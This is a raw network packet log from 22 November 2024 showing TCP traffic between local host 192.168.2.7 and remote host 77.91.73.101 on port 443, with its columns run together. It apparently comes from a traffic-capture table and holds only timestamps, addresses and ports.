                                                                        Nov 22, 2024 17:03:34.885201931 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:34.885231018 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:34.885257959 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:34.885267973 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:34.885292053 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:34.885313034 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:34.898648977 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:34.898668051 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:34.898729086 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:34.898741007 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:34.898840904 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:34.904644966 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:34.904661894 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:34.904752016 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:34.904766083 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:34.904810905 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:34.910300970 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:34.910317898 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:34.910379887 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:34.910391092 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:34.910434008 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.268374920 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.268399954 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.268467903 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.268490076 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.268491983 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.268526077 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.268573046 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.268573046 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.268600941 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.268625975 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.268646002 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.268661976 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.268693924 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.268718004 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.268762112 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.268768072 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.268774033 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.268819094 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.268958092 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.268979073 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.269045115 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.269051075 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.269094944 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.269098043 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.269133091 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.269145966 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.269153118 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.269193888 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.269552946 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.269573927 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.269623041 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.269632101 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.269917011 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.269936085 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.269979000 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.269985914 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.269999981 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.270263910 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.270279884 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.270328999 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.270339012 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.270348072 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.270605087 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.270626068 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.270667076 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.270673990 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.270692110 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.270821095 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.270843029 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.270870924 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.270878077 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.270900011 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.270905018 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.270926952 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.270955086 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.270961046 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.270982981 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.271053076 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.271069050 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.271105051 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.271112919 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.271135092 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.272665024 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.283019066 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.283041000 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.283086061 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.283094883 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.283128977 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.289460897 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.289482117 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.289542913 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.289551973 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.289587021 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.294641018 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.294666052 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.294707060 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.294717073 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.294748068 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.342644930 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.409461021 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.409481049 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.409570932 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.409588099 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.409631014 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.441750050 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.441771984 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.441845894 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.441859007 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.441900015 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.447948933 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.447966099 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.448036909 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.448049068 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.448071957 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.448087931 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.453929901 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.453957081 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.453993082 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.454003096 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.454031944 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.454046965 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.459785938 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.459821939 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.459856987 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.459866047 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.459893942 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.459904909 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.474745035 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.474762917 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.474829912 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.474841118 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.474884033 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.481144905 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.481163979 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.481239080 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.481250048 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.481296062 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.487096071 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.487112999 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.487166882 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.487175941 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.487205029 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.487224102 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.612956047 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.612971067 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.613061905 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.613090038 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.613132000 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.640763044 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.640782118 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.640868902 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.640896082 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.640943050 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.646621943 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.646636963 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.646725893 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.646748066 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.646792889 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.651618958 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.651633978 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.651731014 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.651748896 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.651806116 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.657423973 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.657442093 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.657501936 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.657515049 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.657557964 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.669708014 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.669732094 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.669795036 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.669816971 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.669857025 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.675565004 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.675589085 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.675690889 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.675709009 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.675755978 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.681154013 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.681175947 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.681231022 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.681245089 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.681266069 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.681281090 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.805278063 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.805300951 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.805404902 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.805433035 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.805479050 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.832782984 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.832802057 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.832859993 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.832870007 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.832916021 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.838481903 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.838500977 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.838574886 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.838588953 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.838862896 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.844259977 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.844280958 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.844351053 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.844367027 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.844428062 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.849297047 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.849318027 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.849416018 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.849433899 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.850470066 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.861809969 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.861829996 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.861902952 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.861920118 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.861993074 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.867532015 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.867548943 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.867609978 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.867618084 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.867670059 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.904334068 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.904361963 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.904450893 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:35.904467106 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:35.904521942 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.020842075 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.020868063 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.020952940 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.020968914 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.021001101 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.021020889 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.024935961 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.024950981 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.025017977 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.025024891 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.025109053 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.031193972 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.031210899 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.031280041 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.031286955 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.031325102 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.036468983 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.036484957 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.036569118 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.036576986 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.036684990 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.049355984 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.049371004 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.049454927 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.049462080 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.049571991 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.054056883 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.054074049 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.054198980 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.054204941 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.054248095 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.059669018 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.059685946 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.059767962 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.059779882 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.059942961 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.096712112 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.096736908 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.096815109 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.096828938 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.096864939 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.096877098 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.212894917 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.212924004 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.213020086 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.213044882 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.213109970 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.217833042 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.217850924 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.217911005 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.217917919 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.218458891 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.223807096 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.223829031 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.223905087 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.223913908 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.224080086 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.229243994 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.229305983 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.229357958 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.229367018 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.229403973 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.241652012 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.241672993 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.241780996 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.241797924 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.241851091 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.246160030 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.246180058 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.246251106 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.246264935 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.246324062 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.252259016 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.252278090 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.252362967 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.252374887 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.252425909 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.288759947 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.288779020 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.288846970 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.288865089 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.288908005 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.405462027 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.405527115 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.405616999 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.405617952 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.405644894 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.405689001 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.409712076 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.409733057 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.409779072 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.409790993 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.409823895 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.409851074 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.415570021 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.415591955 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.415652990 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.415667057 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.415714979 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.421230078 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.421256065 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.421308994 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.421320915 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.421405077 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.433759928 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.433783054 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.433897018 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.433904886 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.433943987 CET49740443192.168.2.777.91.73.101
                                                                        Nov 22, 2024 17:03:36.438385963 CET4434974077.91.73.101192.168.2.7
                                                                        Nov 22, 2024 17:03:36.438405991 CET4434974077.91.73.101192.168.2.7
